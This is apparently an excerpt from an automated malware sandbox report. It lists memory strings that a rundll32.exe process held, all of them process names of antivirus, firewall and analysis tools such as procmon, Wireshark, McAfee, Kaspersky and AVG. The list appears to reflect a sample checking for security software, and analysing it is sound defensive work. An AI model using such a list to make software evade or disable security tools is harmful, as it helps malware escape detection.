    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861533714.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640578474.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: procmon.exe
    Source: rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861533714.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640578474.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562924841.0000025BF0130000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935634408.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: tmpfw.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVKService.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fsgk32.exe
    Source: rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563049239.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561299847.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3314134932.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MCAGENT.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3089047921.0000025BF00E8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088903388.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: cctray.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVGNSX.EXE
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fnrb32.exe
    Source: rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3314134932.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239614242.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MCUPDATE.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVGWDSVC.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3314134932.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KAVSVC.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935634408.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fsm32.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVGCSRVX.EXE
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561299847.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3314134932.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KPFWSvc.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935634408.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ravmond.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fsav32.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: defwatch.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935104556.0000025BF00EC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3315134591.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461748687.0000025BF0173000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: avgemc.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE285000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fsdfwd.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nmain.exe
    Source: rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CLAMWIN.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASHMAISV.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ACAAS.exe
    Source: rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563049239.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561299847.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3314134932.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862490782.0000025BEE2E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MCSHIELD.EXE
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935242512.0000025BF0145000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pavfnsvr.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kxetray.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640578474.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: wireshark.exe
    Source: rundll32.exe, 0000000D.00000003.3237961840.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521988705.0000025BF009D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461769420.0000025BF009B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: fast.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fameh32.exe
